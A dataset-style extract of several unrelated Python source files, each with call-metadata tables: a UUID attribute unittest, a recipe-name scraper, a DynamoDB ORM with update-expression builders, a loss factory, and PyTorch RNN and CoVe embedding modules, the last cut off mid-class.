mamrhein/CAmD3 | camd3/infrastructure/component/tests/test_uidattr.py | d20f62295771a297c3fbb314beef314e5ec7a2b5 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Name: test_uidattr
# Purpose: Test driver for module 'uidattr'
#
# Author: Michael Amrhein ([email protected])
#
# Copyright: (c) 2018 Michael Amrhein
# ----------------------------------------------------------------------------
# $Source$
# $Revision$
"""Test driver for module 'uidattr'"""
import unittest
from uuid import uuid1
from camd3.infrastructure.component import (
Component, register_utility, UniqueIdAttribute)
from camd3.infrastructure.component.idfactories import (
UUIDGenerator, uuid_generator)
# factory for UUIDs
def custom_uuid_generator() -> UUIDGenerator: # noqa: D103
while True:
yield uuid1()
class ExplID(Component):
id = UniqueIdAttribute(uid_gen=custom_uuid_generator())
def __init__(self):
self.__class__.id.set_once(self)
class ImplID(Component):
id = UniqueIdAttribute()
def __init__(self):
self.__class__.id.set_once(self)
class UniqueIdAttributeTest(unittest.TestCase):
def setUp(self):
register_utility(uuid_generator(), UUIDGenerator)
self.cid = ImplID()
def test_init(self):
cid = ImplID()
self.assertIsNotNone(cid.id)
self.assertIsNotNone(cid._id)
def test_uniqueness(self):
ids = {self.cid.id}
for i in range(10):
cid = ExplID()
self.assertNotIn(cid.id, ids)
ids.add(cid.id)
if __name__ == '__main__': # pragma: no cover
unittest.main()
| [((43, 9, 43, 28), 'camd3.infrastructure.component.UniqueIdAttribute', 'UniqueIdAttribute', ({}, {}), '()', False, 'from camd3.infrastructure.component import Component, register_utility, UniqueIdAttribute\n'), ((69, 4, 69, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((30, 14, 30, 21), 'uuid.uuid1', 'uuid1', ({}, {}), '()', False, 'from uuid import uuid1\n'), ((52, 25, 52, 41), 'camd3.infrastructure.component.idfactories.uuid_generator', 'uuid_generator', ({}, {}), '()', False, 'from camd3.infrastructure.component.idfactories import UUIDGenerator, uuid_generator\n')] |
tn012604409/HW3_chatRobot | s.py | 97762e53bfccd8b30c6b263792919c679e53b404 | import requests
import time
from bs4 import BeautifulSoup
def get_web_page(url):
resp = requests.get(
url=url,
)
if resp.status_code != 200:
print('Invalid url:', resp.url)
return None
else:
return resp.text
def get_articles(dom):
soup = BeautifulSoup(dom, 'html.parser')
tag = soup.find_all('a','recipe-name')
articles=tag
return articles
def run():
page = get_web_page('https://icook.tw/recipes/popular?ref=icook-footer')
if page:
current_articles = get_articles(page)
i=1
s=''
for post in current_articles:
            # Read the recipe name from the <a class="recipe-name"> tag text
            # instead of slicing the raw HTML string, which is brittle.
            name = post.get_text(strip=True)
            s = s + 'The Number {0}: {1}\n'.format(i, name)
            i = i + 1
return s
| [((7, 11, 9, 5), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((18, 11, 18, 44), 'bs4.BeautifulSoup', 'BeautifulSoup', ({(18, 25, 18, 28): 'dom', (18, 30, 18, 43): '"""html.parser"""'}, {}), "(dom, 'html.parser')", False, 'from bs4 import BeautifulSoup\n')] |
k2bd/awstin | awstin/dynamodb/orm.py | 7360cc20d3c72a6aa87de57146b9c5f4247c58d5 | import uuid
from abc import ABC, abstractmethod
from collections import defaultdict
from typing import Union
from boto3.dynamodb.conditions import Attr as BotoAttr
from boto3.dynamodb.conditions import Key as BotoKey
from awstin.dynamodb.utils import from_decimal, to_decimal
class NotSet:
"""
A value of an attribute on a data model is not present in a DynamoDB result
"""
def __str__(self):
return "<<Attribute not set>>"
def __repr__(self):
return "<<Attribute not set>>"
NOT_SET = NotSet()
class BaseAttribute:
def __init__(self, attribute_name: Union[str, None] = None):
"""
Parameters
----------
attribute_name : str, optional
Name of the property in the DynamoDB table. Defaults to the name of
the attribute on the DynamoModel class.
"""
# Set by user
self._attribute_name = attribute_name
# Set by Model
self._name_on_model = None
@property
def _awstin_name(self):
if self._attribute_name is not None:
return self._attribute_name
else:
return self._name_on_model
def __getattr__(self, name):
"""
Support for nested mapping queries
"""
try:
return super().__getattr__(name)
except AttributeError:
return type(self)(attribute_name=f"{self._awstin_name}.{name}")
def __getitem__(self, index):
"""
Support for nested container queries
"""
return type(self)(attribute_name=f"{self._awstin_name}[{index}]")
# --- Query and scan filter expressions ---
def begins_with(self, value):
"""
Filter results by a key or attribute beginning with a value
Parameters
----------
value : str
Starting string for returned results
"""
return self._query_type(self._awstin_name).begins_with(to_decimal(value))
def between(self, low, high):
"""
Filter results by range (inclusive)
Parameters
----------
low : Any
Low end of the range
high : Any
High end of the range
"""
return self._query_type(self._awstin_name).between(
to_decimal(low),
to_decimal(high),
)
def __eq__(self, value):
return self._query_type(self._awstin_name).eq(to_decimal(value))
def __gt__(self, value):
return self._query_type(self._awstin_name).gt(to_decimal(value))
def __ge__(self, value):
return self._query_type(self._awstin_name).gte(to_decimal(value))
def __lt__(self, value):
return self._query_type(self._awstin_name).lt(to_decimal(value))
def __le__(self, value):
return self._query_type(self._awstin_name).lte(to_decimal(value))
def attribute_type(self, value):
"""
Filter results by attribute type
Parameters
----------
value : str
Index for a DynamoDB attribute type (e.g. "N" for Number)
"""
return BotoAttr(self._awstin_name).attribute_type(to_decimal(value))
def contains(self, value):
"""
Filter results by attributes that are containers and contain the target
value
Parameters
----------
values : Any
Result must contain this item
"""
return BotoAttr(self._awstin_name).contains(to_decimal(value))
def exists(self):
"""
Filter results by existence of an attribute
"""
return BotoAttr(self._awstin_name).exists()
def in_(self, values):
"""
Filter results by existence in a set
Parameters
----------
values : list of Any
Allowed values of returned results
"""
in_values = [to_decimal(value) for value in values]
return BotoAttr(self._awstin_name).is_in(in_values)
def __ne__(self, value):
return BotoAttr(self._awstin_name).ne(to_decimal(value))
def not_exists(self):
"""
Filter results by non-existence of an attribute
"""
return BotoAttr(self._awstin_name).not_exists()
def size(self):
"""
Filter by size of a collection
"""
return Size(self._awstin_name)
# --- Update expressions ---
def set(self, expression):
"""
Set an attribute to a new value.
Corresponds to SET as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
New value, or an expression defining a new value
"""
return SetOperator(self, UpdateOperand(expression))
def remove(self):
"""
Remove an attribute.
Corresponds to REMOVE as part of the update expression in
``Table.update_item``.
"""
return RemoveOperator(self)
def add(self, expression):
"""
Add to an attribute (numerical add or addition to a set).
Corresponds to ADD as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to add
"""
return AddOperator(self, UpdateOperand(expression))
def delete(self, expression):
"""
Delete part of a set attribute.
Corresponds to DELETE as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to delete
"""
return DeleteOperator(self, UpdateOperand(expression))
def __add__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "+")
def __sub__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "-")
def __radd__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "+")
def __rsub__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "-")
def if_not_exists(self, value):
"""
Conditionally return a value if this attribute doesn't exist on the
model
"""
return IfNotExistsOperand(UpdateOperand(self), UpdateOperand(value))
class Key(BaseAttribute):
"""
Used to define and query hash and sort key attributes on a dynamodb table
data model
"""
_query_type = BotoKey
class Attr(BaseAttribute):
"""
Used to define and query non-key attributes on a dynamodb table data model
"""
_query_type = BotoAttr
def size_query(self, *args, **kwargs):
return BotoAttr(self._awstin_name).size()
class Size(BaseAttribute):
_query_type = size_query
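# Usage sketch (assumed, not part of this module): standalone Key/Attr instances
# build boto3 conditions when given an explicit attribute name; "name" and
# "score" below are placeholder attribute names.
#
#   key_cond = Key(attribute_name="name") == "alice"        # boto3 Key condition
#   filt = Attr(attribute_name="score").between(10, 20)     # boto3 Attr condition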
class DynamoModelMeta(type):
def __getattribute__(self, name):
attr = super().__getattribute__(name)
if isinstance(attr, BaseAttribute):
attr._name_on_model = name
return attr
else:
return attr
def _dynamodb_attributes(self):
result = {
getattr(self, attr)._awstin_name: attr
for attr in dir(self)
if isinstance(getattr(self, attr), BaseAttribute)
}
return result
def _get_kwargs(self):
"""
Kwargs that should be passed to query, scan, get_item
"""
return {
**self._dynamo_projection(),
**self._index_kwargs(),
}
def _dynamo_projection(self):
"""
Attributes to request when retrieving data from DynamoDB
Returns
-------
dict
kwargs to be passed to DynamoDB get attribute calls to employ
a projection expression and placeholders
"""
placeholders = {
"#" + str(uuid.uuid4())[:8]: value
for value in self._dynamodb_attributes().keys()
}
expression = ", ".join(placeholders.keys())
return dict(
ProjectionExpression=expression,
ExpressionAttributeNames=placeholders,
)
def _index_kwargs(self):
if hasattr(self, "_index_name_"):
return dict(
IndexName=self._index_name_,
)
else:
return {}
class DynamoModel(metaclass=DynamoModelMeta):
"""
Class defining an ORM model for a DynamoDB table.
Subclasses must have a ``_table_name_`` attribute. Attributes making up
the data model should be Attr or Key instances.
Subclasses representing indexes should also have an ``_index_name_``
attribute
"""
def __init__(self, **kwargs):
"""
Parameters
----------
**kwargs : dict of (str, Any)
Initialization of Attr and Key attributes.
"""
model_attrs = type(self)._dynamodb_attributes().values()
for name in model_attrs:
setattr(self, name, NOT_SET)
for name, value in kwargs.items():
if name not in model_attrs:
msg = f"{type(self)!r} has no attribute {name!r}"
raise AttributeError(msg)
setattr(self, name, value)
@classmethod
def deserialize(cls, data):
"""
Deserialize JSON into a DynamoModel subclass. Internally converts
Decimal to float in the deserialization.
Parameters
----------
data : dict of (str, Any)
Serialized model
Returns
-------
DynamoModel
The deserialized data model
"""
model_attrs = cls._dynamodb_attributes()
result = cls()
for attr in model_attrs.values():
setattr(result, attr, NOT_SET)
for db_attr, value in data.items():
if db_attr in model_attrs.keys():
if type(value) in [list, set, tuple]:
value = type(value)(from_decimal(v) for v in value)
elif type(value) is dict:
value = {from_decimal(k): from_decimal(v) for k, v in value.items()}
else:
value = from_decimal(value)
setattr(result, model_attrs[db_attr], value)
return result
def serialize(self):
"""
Serialize a DynamoModel subclass to JSON that can be inserted into
DynamoDB. Internally converts float to Decimal.
Returns
-------
dict of (str, Any)
The serialized JSON entry
"""
model_attrs = type(self)._dynamodb_attributes()
result = {}
for dynamo_name, model_name in model_attrs.items():
value = getattr(self, model_name)
if value is not NOT_SET:
if type(value) in [list, set, tuple]:
value = type(value)(to_decimal(v) for v in value)
elif type(value) is dict:
value = {to_decimal(k): to_decimal(v) for k, v in value.items()}
else:
value = to_decimal(value)
result[dynamo_name] = value
return result
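# Example sketch (assumed usage, all names are placeholders): a concrete model
# subclasses DynamoModel, names its table, and declares Key/Attr attributes.
#
#   class Player(DynamoModel):
#       _table_name_ = "players"
#       name = Key()
#       score = Attr()
#
#   item = Player(name="alice", score=10)
#   data = item.serialize()                    # dict ready for a boto3 put_item
#   again = Player.deserialize(data)           # back to a Player instance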
# ---- Update Operators
class UpdateOperator(ABC):
"""
A representation of an UpdateItem expression
"""
def __and__(self, other):
"""
Combine two update expressions
"""
return CombineOperator(self, other)
@abstractmethod
def update_dict(self):
pass
@staticmethod
def update_expression(update_dict):
expressions = []
for operation in "SET", "ADD", "DELETE", "REMOVE":
if update_dict.get(operation):
expressions.append(operation + " " + ", ".join(update_dict[operation]))
return " ".join(expressions)
def serialize(self):
"""
Produce kwargs to be passed to DynamoDB Table.update_item.
Keys and values are:
"UpdateExpression": string representing the update expression
"ExpressionAttributeNames": Placeholder map for attribute names
"ExpressionAttributeValues": Placeholder map for attribute values
Returns
-------
dict
Kwargs for update_item
"""
update_dict = self.update_dict()
result = {
"UpdateExpression": self.update_expression(update_dict),
}
if update_dict["ExpressionAttributeNames"]:
result["ExpressionAttributeNames"] = update_dict["ExpressionAttributeNames"]
if update_dict["ExpressionAttributeValues"]:
result["ExpressionAttributeValues"] = update_dict[
"ExpressionAttributeValues"
]
return result
class CombineOperator(UpdateOperator):
"""
Combine two update expressions
"""
def __init__(self, left, right):
self.left = left
self.right = right
def update_dict(self):
result = defaultdict(list)
ser_left = self.left.update_dict()
ser_right = self.right.update_dict()
items = list(ser_left.items()) + list(ser_right.items())
for key, values in items:
if key in ["SET", "ADD", "DELETE", "REMOVE"]:
result[key].extend(values)
result["ExpressionAttributeNames"] = dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
)
result["ExpressionAttributeValues"] = dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
)
return result
class SetOperator(UpdateOperator):
"""
Support for SET
"""
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"SET": [
f"{serialized_attr['UpdateExpression']} = "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class AddOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"ADD": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class RemoveOperator(UpdateOperator):
def __init__(self, attr):
self.attr = attr
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
return {
"REMOVE": [serialized_attr["UpdateExpression"]],
"ExpressionAttributeNames": serialized_attr["ExpressionAttributeNames"],
"ExpressionAttributeValues": {},
}
class DeleteOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"DELETE": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
# ---- Update Operands
def serialize_operand(value):
name = str(uuid.uuid4())[:8]
if isinstance(value, UpdateOperand):
return value.serialize()
elif isinstance(value, BaseAttribute):
return itemize_attr(value)
elif type(value) in [list, set, tuple]:
name = ":" + name
value = type(value)([to_decimal(v) for v in value])
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: value},
}
else:
name = ":" + name
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: to_decimal(value)},
}
def itemize_attr(attr):
# Separate indexes
parts = []
current_section = ""
for letter in attr._awstin_name:
if letter == "[":
parts.append(current_section)
current_section = "["
elif letter == "]":
parts.append(current_section + "]")
current_section = ""
else:
current_section += letter
if current_section:
parts.append(current_section)
serialized = ""
name_map = {}
# Separate attributes
for part in parts:
if "[" in part and "]" in part:
serialized += part
else:
if part.startswith("."):
serialized += "."
part = part[1:]
sections = part.split(".")
serialized_sections = []
for section in sections:
name = "#" + str(uuid.uuid4())[:8]
name_map[name] = section
serialized_sections.append(name)
serialized += ".".join(serialized_sections)
result = {
"UpdateExpression": serialized,
"ExpressionAttributeNames": name_map,
"ExpressionAttributeValues": {},
}
return result
class UpdateOperand:
"""
Inner part of an update expression
"""
def __init__(self, value):
self.value = value
def serialize(self):
return serialize_operand(self.value)
class CombineOperand(UpdateOperand):
"""
    Add or subtract two expressions
"""
def __init__(self, left, right, symbol):
self.left = left
self.right = right
self.symbol = symbol
def serialize(self):
ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"{ser_left['UpdateExpression']} "
f"{self.symbol} "
f"{ser_right['UpdateExpression']}"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
class IfNotExistsOperand(UpdateOperand):
"""
Set a value if the given attribute does not exist
"""
def __init__(self, attr, value):
self.attr = attr
self.value = value
def serialize(self):
ser_attr = serialize_operand(self.attr)
ser_value = serialize_operand(self.value)
expression = (
f"if_not_exists({ser_attr['UpdateExpression']}, "
f"{ser_value['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_attr["ExpressionAttributeNames"],
**ser_value["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_attr["ExpressionAttributeValues"],
**ser_value["ExpressionAttributeValues"],
),
}
class ListAppendOperand(UpdateOperand):
"""
Combine two lists
"""
def __init__(self, left, right):
self.left = left
self.right = right
def serialize(self):
ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"list_append({ser_left['UpdateExpression']}, "
f"{ser_right['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
def list_append(left, right):
"""
Set a value to the combination of two lists in an update expression
"""
return ListAppendOperand(UpdateOperand(left), UpdateOperand(right))
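# Usage sketch (assumed, building on the hypothetical Player model sketched above;
# "tags" is a hypothetical list attribute): operators chain with "&" into a single
# UpdateItem expression.
#
#   update = (
#       Player.score.set(Player.score + 1)                     # SET score = score + 1
#       & Player.tags.set(list_append(Player.tags, ["new"]))   # append to a list
#   )
#   kwargs = update.serialize()   # UpdateExpression plus placeholder maps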
| [((470, 17, 470, 34), 'collections.defaultdict', 'defaultdict', ({(470, 29, 470, 33): 'list'}, {}), '(list)', False, 'from collections import defaultdict\n'), ((75, 63, 75, 80), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(75, 74, 75, 79): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((89, 12, 89, 27), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(89, 23, 89, 26): 'low'}, {}), '(low)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((90, 12, 90, 28), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(90, 23, 90, 27): 'high'}, {}), '(high)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((94, 54, 94, 71), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(94, 65, 94, 70): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((97, 54, 97, 71), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(97, 65, 97, 70): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((100, 55, 100, 72), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(100, 66, 100, 71): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((103, 54, 103, 71), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(103, 65, 103, 70): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((106, 55, 106, 72), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(106, 66, 106, 71): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((117, 58, 117, 75), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(117, 69, 117, 74): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((129, 52, 129, 69), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(129, 63, 129, 68): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((146, 21, 146, 38), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(146, 32, 146, 37): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((150, 46, 150, 63), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(150, 57, 150, 62): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((251, 11, 251, 38), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(251, 20, 251, 37): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((588, 15, 588, 27), 'uuid.uuid4', 'uuid.uuid4', ({}, {}), '()', False, 'import uuid\n'), ((117, 15, 117, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(117, 24, 117, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((129, 15, 129, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(129, 24, 129, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((135, 15, 135, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(135, 24, 135, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((147, 15, 147, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(147, 24, 147, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((150, 
15, 150, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(150, 24, 150, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((156, 15, 156, 42), 'boto3.dynamodb.conditions.Attr', 'BotoAttr', ({(156, 24, 156, 41): 'self._awstin_name'}, {}), '(self._awstin_name)', True, 'from boto3.dynamodb.conditions import Attr as BotoAttr\n'), ((295, 22, 295, 34), 'uuid.uuid4', 'uuid.uuid4', ({}, {}), '()', False, 'import uuid\n'), ((372, 28, 372, 47), 'awstin.dynamodb.utils.from_decimal', 'from_decimal', ({(372, 41, 372, 46): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((399, 28, 399, 45), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(399, 39, 399, 44): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((597, 29, 597, 42), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(597, 40, 597, 41): 'v'}, {}), '(v)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((609, 48, 609, 65), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(609, 59, 609, 64): 'value'}, {}), '(value)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((368, 40, 368, 55), 'awstin.dynamodb.utils.from_decimal', 'from_decimal', ({(368, 53, 368, 54): 'v'}, {}), '(v)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((370, 29, 370, 44), 'awstin.dynamodb.utils.from_decimal', 'from_decimal', ({(370, 42, 370, 43): 'k'}, {}), '(k)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((370, 46, 370, 61), 'awstin.dynamodb.utils.from_decimal', 'from_decimal', ({(370, 59, 370, 60): 'v'}, {}), '(v)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((395, 40, 395, 53), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(395, 51, 395, 52): 'v'}, {}), '(v)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((397, 29, 397, 42), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(397, 40, 397, 41): 'k'}, {}), '(k)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((397, 44, 397, 57), 'awstin.dynamodb.utils.to_decimal', 'to_decimal', ({(397, 55, 397, 56): 'v'}, {}), '(v)', False, 'from awstin.dynamodb.utils import from_decimal, to_decimal\n'), ((645, 33, 645, 45), 'uuid.uuid4', 'uuid.uuid4', ({}, {}), '()', False, 'import uuid\n')] |
SimonTheVillain/ActiveStereoNet | Losses/__init__.py | 708bddce844998b366be1a1ec8a72a31ccd26f8c | from .supervise import *
def get_losses(name, **kwargs):
name = name.lower()
if name == 'rhloss':
loss = RHLoss(**kwargs)
elif name == 'xtloss':
loss = XTLoss(**kwargs)
else:
raise NotImplementedError('Loss [{:s}] is not supported.'.format(name))
return loss
| [] |
qkaren/converse_reading_cmr | model/src/recurrent.py | d06d981be12930cff8458e2b1b81be4f5df3a329 | import torch
import torch.nn as nn
from torch.nn.parameter import Parameter
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.nn.utils.rnn import pack_padded_sequence as pack
from .my_optim import weight_norm as WN
# TODO: use system func to bind ~
RNN_MAP = {'lstm': nn.LSTM, 'gru': nn.GRU, 'rnn': nn.RNN}
class OneLayerBRNN(nn.Module):
def __init__(self, input_size, hidden_size, prefix='stack_rnn', opt={}, dropout=None):
super(OneLayerBRNN, self).__init__()
self.opt = opt
self.prefix = prefix
self.cell_type = self.opt.get('{}_cell'.format(self.prefix), 'lstm')
self.emb_dim = self.opt.get('{}_embd_dim'.format(self.prefix), 0)
self.maxout_on = self.opt.get('{}_maxout_on'.format(self.prefix), False)
self.weight_norm_on = self.opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.dropout = dropout
self.output_size = hidden_size if self.maxout_on else hidden_size * 2
self.hidden_size = hidden_size
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, num_layers=1, bidirectional=True)
def forward(self, x, x_mask):
x = x.transpose(0, 1)
size = list(x.size())
rnn_output, h = self.rnn(x)
if self.maxout_on:
rnn_output = rnn_output.view(size[0], size[1], self.hidden_size, 2).max(-1)[0]
# Transpose back
hiddens = rnn_output.transpose(0, 1)
return hiddens
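# Shape sketch (assumed defaults): OneLayerBRNN consumes a batch-first tensor and
# returns batch-first hidden states; with maxout off the feature size doubles.
#
#   layer = OneLayerBRNN(input_size=300, hidden_size=128)
#   x = torch.zeros(4, 20, 300)      # (batch, seq_len, input_size)
#   mask = torch.zeros(4, 20)        # padding mask (not used by this layer)
#   out = layer(x, mask)             # (4, 20, 256)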
class BRNNEncoder(nn.Module):
def __init__(self, input_size, hidden_size, prefix='rnn', opt={}, dropout=None):
super(BRNNEncoder, self).__init__()
        self.opt = opt
        self.prefix = prefix
self.dropout = dropout
self.cell_type = opt.get('{}_cell'.format(self.prefix), 'gru')
self.weight_norm_on = opt.get('{}_weight_norm_on'.format(self.prefix), False)
self.top_layer_only = opt.get('{}_top_layer_only'.format(self.prefix), False)
self.num_layers = opt.get('{}_num_layers'.format(self.prefix), 1)
self.rnn = RNN_MAP[self.cell_type](input_size, hidden_size, self.num_layers, bidirectional=True)
if self.weight_norm_on:
self.rnn = WN(self.rnn)
if self.top_layer_only:
self.output_size = hidden_size * 2
else:
self.output_size = self.num_layers * hidden_size * 2
def forward(self, x, x_mask):
x = self.dropout(x)
_, h = self.rnn(x.transpose(0, 1).contiguous())
if self.cell_type == 'lstm':
h = h[0]
shape = h.size()
            # h: (num_layers * 2, batch, hidden) -> (num_layers, batch, 2 * hidden)
            h = h.view(self.num_layers, 2, shape[1], shape[2]).transpose(1, 2).contiguous()
            h = h.view(self.num_layers, shape[1], 2 * shape[2])
if self.top_layer_only:
return h[-1]
else:
            return h.transpose(0, 1).contiguous().view(x.size(0), -1)
#------------------------------
# Contextual embedding
# TODO: remove packing to speed up
# Credit from: https://github.com/salesforce/cove
#------------------------------
class ContextualEmbedV2(nn.Module):
def __init__(self, model_path, padding_idx=0):
super(ContextualEmbedV2, self).__init__()
state_dict = torch.load(model_path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
state_dict2 = dict([(name.replace('1', '0'), param.data) if isinstance(param, Parameter) else (name.replace('1', '0'), param)
for name, param in state_dict.items() if '1' in name])
self.rnn1.load_state_dict(state_dict1)
self.rnn2.load_state_dict(state_dict2)
for p in self.parameters(): p.requires_grad = False
self.output_size = 600
def setup_eval_embed(self, eval_embed, padding_idx=0):
pass
def forward(self, x, x_mask):
"""A pretrained MT-LSTM (McCann et. al. 2017).
"""
lengths = x_mask.data.eq(0).long().sum(1).squeeze()
lens, indices = torch.sort(lengths, 0, True)
output1, _ = self.rnn1(pack(x[indices], lens.tolist(), batch_first=True))
output2, _ = self.rnn2(output1)
output1 = unpack(output1, batch_first=True)[0]
output2 = unpack(output2, batch_first=True)[0]
_, _indices = torch.sort(indices, 0)
output1 = output1[_indices]
output2 = output2[_indices]
return output1, output2
class ContextualEmbed(nn.Module):
def __init__(self, path, vocab_size, emb_dim=300, embedding=None, padding_idx=0):
super(ContextualEmbed, self).__init__()
self.embedding = nn.Embedding(vocab_size, emb_dim, padding_idx=padding_idx)
if embedding is not None:
self.embedding.weight.data = embedding
state_dict = torch.load(path)
self.rnn1 = nn.LSTM(300, 300, num_layers=1, bidirectional=True)
self.rnn2 = nn.LSTM(600, 300, num_layers=1, bidirectional=True)
state_dict1 = dict([(name, param.data) if isinstance(param, Parameter) else (name, param)
for name, param in state_dict.items() if '0' in name])
